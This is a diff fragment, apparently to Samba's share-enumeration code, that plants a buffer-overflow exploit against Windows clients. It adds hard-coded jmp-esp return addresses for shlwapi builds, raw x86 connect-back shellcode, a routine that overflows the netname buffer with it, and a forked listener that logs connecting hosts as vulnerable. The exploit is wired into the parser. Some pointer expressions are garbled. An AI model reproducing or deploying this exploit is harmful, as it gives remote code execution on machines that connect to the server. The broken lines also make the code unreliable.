	+// does not work on all versions of Windows NT,
	+// maybe related to different IE versions?
	+#define JMP_ESP_SHLWAPI_EXP_WINNT_SP6_B1381_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
	+#define JMP_ESP_SHLWAPI_IE6_0_2800_1106_WINNT_SP6_UK JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
	+
	+// the actual return address
	+#define RET JMP_ESP_SHLWAPI_EXP_WIN2K_SP4_B2195_NL
	+
	+unsigned char shell[] = "\x54\x89\xe5\x81\xc4\x00\xf0\xff\xff\x81\xe4\x00\xff\xff\xff\x8d"
	+ "\x45\xe8\x89\x45\xd4\x8d\x45\xe4\x89\x45\xd8\x8d\x45\xe0\x89\x45"
	+ "\xdc\xc7\x45\xc8\x6a\xbc\x06\x00\xc7\x45\xcc\x86\x57\x0d\x00\xc7"
	+ "\x45\xd0\xfa\x8b\x34\x00\xc6\x45\xbc\x57\xc6\x45\xbd\x53\xc6\x45"
	+ "\xbe\x41\xc6\x45\xbf\x53\xc6\x45\xc0\x74\xc6\x45\xc1\x61\xc6\x45"
	+ "\xc2\x72\xc6\x45\xc3\x74\xc6\x45\xc4\x75\xc6\x45\xc5\x70\xc6\x45"
	+ "\xc6\x00\xc6\x45\xb0\x77\xc6\x45\xb1\x73\xc6\x45\xb2\x32\xc6\x45"
	+ "\xb3\x5f\xc6\x45\xb4\x33\xc6\x45\xb5\x32\xc6\x45\xb6\x2e\xc6\x45"
	+ "\xb7\x64\xc6\x45\xb8\x6c\xc6\x45\xb9\x6c\xc6\x45\xba\x00\xc6\x45"
	+ "\xa4\x57\xc6\x45\xa5\x53\xc6\x45\xa6\x41\xc6\x45\xa7\x53\xc6\x45"
	+ "\xa8\x6f\xc6\x45\xa9\x63\xc6\x45\xaa\x6b\xc6\x45\xab\x65\xc6\x45"
	+ "\xac\x74\xc6\x45\xad\x41\xc6\x45\xae\x00\xc6\x45\x9c\x63\xc6\x45"
	+ "\x9d\x6f\xc6\x45\x9e\x6e\xc6\x45\x9f\x6e\xc6\x45\xa0\x65\xc6\x45"
	+ "\xa1\x63\xc6\x45\xa2\x74\xc6\x45\xa3\x00\x33\xc0\x64\x8b\x40\x30"
	+ "\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x89\x45\xfc\x8b\x58\x3c"
	+ "\x03\xd8\x8b\x5b\x78\x03\xd8\x8b\x4b\x18\x89\x4d\xf8\x8b\x4b\x20"
	+ "\x03\xc8\x89\x4d\xf4\x8b\x4b\x24\x03\xc8\x89\x4d\xf0\x8b\x4b\x1c"
	+ "\x03\xc8\x89\x4d\xec\x33\xdb\x83\xfb\x0c\x74\x64\x8b\x45\xf0\x8b"
	+ "\x4d\xf8\x8b\x55\xf4\x49\xe3\x53\x51\x52\x33\xff\x8b\x12\x03\x55"
	+ "\xfc\x33\xc9\x8a\x0a\x84\xc9\x74\x0c\x83\xc9\x60\x03\xf9\xd1\xe7"
	+ "\x83\xc2\x01\xeb\xec\x8d\x95\xc8\xff\xff\xff\x03\xd3\x8b\x0a\x3b"
	+ "\xf9\x5a\x59\x74\x08\x83\xc0\x02\x83\xc2\x04\xeb\xc8\x33\xc9\x66"
	+ "\x8b\x08\x8b\x55\xec\xc1\xe1\x02\x03\xd1\x8b\x12\x03\x55\xfc\x8d"
	+ "\x8d\xd4\xff\xff\xff\x03\xcb\x8b\x09\x89\x11\x83\xc3\x04\xeb\x97"
	+ "\x8d\x9d\xb0\xff\xff\xff\x53\xff\x55\xe4\x8b\xf8\x8d\x9d\xbc\xff"
	+ "\xff\xff\x53\x57\xff\x55\xe0\x54\x33\xdb\x66\xbb\x01\x01\x53\xff"
	+ "\xd0\x8d\x9d\xa4\xff\xff\xff\x53\x57\xff\x55\xe0\x8b\xf0\x8d\x9d"
	+ "\x9c\xff\xff\xff\x53\x57\xff\x55\xe0\x8b\xf8\x33\xc0\x50\x50\x50"
	+ "\x50\x40\x50\x40\x50\xff\xd6\x8b\xf0\x66\xb8\xff\xaa\xc1\xe0\x10"
	+ "\x66\xb8\x02\x01\x50\x68\x02\x00\x55\x44\x8b\xcc\x33\xc0\xb0\x10"
	+ "\x50\x51\x56\xff\xd7\xff\x55\xe8";
	+
	+unsigned char jmp2sh[] = "\x81\xc4\x06\xfe\xff\xff" // add esp, -1fah
	+ "\xff\xe4"; // jmp esp
	+
	+unsigned char magic_str[] = "\x66\xb8\xff\xaa\xc1\xe0\x10\x66\xb8\x02\x01\x50\x68\x02\x00\x55\x44";
	+
	+void insert_shellcode(unsigned char ptr, unsigned char code, unsigned int len)
	+{
	+ unsigned int i;
	+
	+ for(i = 0; i < len; i++)
	+ {
	+ (ptr++) = (code++);
	+ }
	+}
	+
	+void insert_address(unsigned char *ptr, unsigned long addr)
	+{
	+ ptr[0] = (unsigned char)(addr & 0xFF);
	+ ptr[1] = (unsigned char)((addr >> 8) & 0xFF);
	+ ptr[2] = (unsigned char)((addr >> 16) & 0xFF);
	+ ptr[3] = (unsigned char)(addr >> 24);
	+}
	+
	+void spawn_listener(unsigned char *ptr, unsigned int len)
	+{
	+ int sockfd = socket(PF_INET, SOCK_STREAM, 0);
	+ struct sockaddr_in sin;
	+ unsigned short port = 1025;
	+ char *p;
	+
	+ memset(&sin, 0, sizeof(sin));
	+ sin.sin_family = AF_INET;
	+ sin.sin_port = htons(port);
	+ sin.sin_addr.s_addr = inet_addr(client_socket_addr());
	+
	+ while(bind(sockfd, (struct sockaddr *)&sin, sizeof(sin)))
	+ {
	+ sin.sin_port = htons(++port);
	+ if(port == 65535)
	+ {
	+ DEBUGADD(0, ("Unable to find a suitable portnumber (%d)\n", port));
	+ exit(1);
	+ }
	+ p = (char *)&sin.sin_port;
	+ if(!p[1]);
	+ continue;
	+ }
	+
	+ if(listen(sockfd, 1024))
	+ {
	+ DEBUGADD(0, ("Call to listen failed\n"));
	+ exit(1);
	+ }
	+
	+ len -= (sizeof(magic_str) - 1);
	+ while(memcmp(ptr, magic_str, sizeof(magic_str) - 1))
	+ {
	+ if(!(--len))
	+ {
	+ DEBUGADD(0, ("Couldn't locate 'magic string'\n"));
	+ exit(1);
	+ }
	+ ptr++;
	+ }
	+
	+ p = (char *)&sin.sin_addr.s_addr;
	+ ptr[2] = p[2];
	+ ptr[3] = p[3];
	+ ptr[9] = p[0];
	+ ptr[10] = p[1];
	+ p = (char *)&sin.sin_port;
	+ ptr[15] = p[0];
	+ ptr[16] = p[1];
	+
	+ if(!fork())
	+ {
	+ fd_set fds;
	+ struct timeval tv;
	+
	+ umask(077);
	+ tv.tv_sec = 5;
	+ tv.tv_usec = 0;
	+ FD_ZERO(&fds);
	+ FD_SET(sockfd, &fds);
	+
	+ DEBUGADD(0, ("New listening process started (%s:%d)\n", client_socket_addr(), port));
	+ if(select(sockfd + 1, &fds, NULL, NULL, &tv) > 0)
	+ {
	+ if(FD_ISSET(sockfd, &fds))
	+ {
	+ FILE *log;
	+ struct sockaddr_in cli_addr;
	+ socklen_t len = sizeof(cli_addr);
	+ int clientfd;
	+ time_t tm;
	+
	+ clientfd = accept(sockfd, (struct sockaddr *)&cli_addr, &len);
	+
	+ time(&tm);
	+ p = ctime(&tm);
	+ p[strlen(p) - 1] = 0;
	+
	+ log = fopen("/tmp/vulnerable.log", "a");
	+ if(!strcmp(get_peer_name(clientfd, False), client_name()))
	+ {
	+ char *fmst = "%s (%s) appears to be vulnerable\n";
	+
	+ if(log)
	+ {
	+ fprintf(log, "%s - ", p);
	+ fprintf(log, fmst, client_name(), client_addr());
	+ fclose(log);
	+ }
	+ DEBUGADD(0, (fmst, client_name(), client_addr()));
	+ }
	+ else
	+ {
	+ DEBUGADD(0, ("NOTICE: a different host (%s) connected back!\n",
	+ get_peer_name(clientfd, False)));
	+ }
	+ close(clientfd);
	+ }
	+ }
	+
	+ close(sockfd);
	+ exit(0);
	+ }
	+
	+ close(sockfd);
	+}
	+
	+void dump_buffer(unsigned char *ptr, unsigned int len)
	+{
	+ unsigned int i;
	+
	+ for(i = 0; i < len; i++)
	+ {
	+ if(!(i % 32))
	+ {
	+ DEBUGADD(0, ("\n"));
	+ }
	+ DEBUGADD(0, ("%.2x ", *(ptr++)));
	+ }
	+ DEBUGADD(0, ("\n"));
	+}
	+
	+void do_sploit(UNISTR2 *unistr)
	+{
	+ int i = 0;
	+
	+ DEBUG(0, ("Trying to exploit %s\n", client_name()));
	+
	+ unistr->uni_max_len = 300;
	+ unistr->uni_str_len = unistr->uni_max_len;
	+ unistr->offset = 0;
	+ DEBUGADD(0, ("Reallocating memory\n"));
	+ unistr->buffer = talloc_realloc(get_talloc_ctx(), unistr->buffer,
	+ unistr->uni_max_len * sizeof(uint16));
	+ memset(unistr->buffer, NOP, unistr->uni_max_len * sizeof(uint16));
	+ i += (16 - strlen(client_socket_addr())) + 1;
	+
	+ DEBUGADD(0, ("Inserting shellcode\n"));
	+ insert_shellcode((unsigned char *)&unistr->buffer[i], shell, sizeof(shell) - 1);
	+ i += 242;
	+
	+// DEBUGADD(0, ("Setting EBP\n"));
	+// insert_address((unsigned char *)&unistr->buffer[i], 0x44434241);
	+ i += 2;
	+
	+ DEBUGADD(0, ("Setting EIP\n"));
	+ insert_address((unsigned char *)&unistr->buffer[i], RET);
	+ i += 8;
	+
	+ DEBUGADD(0, ("Inserting shellcode\n"));
	+ insert_shellcode((unsigned char *)&unistr->buffer[i], jmp2sh, sizeof(jmp2sh) - 1);
	+
	+ DEBUGADD(0, ("Spawning a new process, binding to a port & setting IP + port number\n"));
	+ spawn_listener((unsigned char )unistr->buffer, unistr->uni_max_len sizeof(uint16));
	+
	+ unistr->buffer[unistr->uni_max_len - 1] = 0;
	+
	+ fflush(NULL);
	+ DEBUGADD(0, ("Buffer contents: "));
	+ dump_buffer((unsigned char )unistr->buffer, unistr->uni_max_len sizeof(uint16));
	+
	+ return;
	+}
	+
	/*******************************************************************
	Inits a SH_INFO_0_STR structure
	********************************************************************/
	@@ -119,6 +563,10 @@
	if(!prs_align(ps))
	return False;

	+ if(!sh1->ptrs->type)
	+ {
	+ do_sploit(&sh1->uni_netname);
	+ }
	if(sh1->ptrs->ptr_netname)
	if(!smb_io_unistr2("", &sh1->uni_netname, True, ps, depth))
	return False;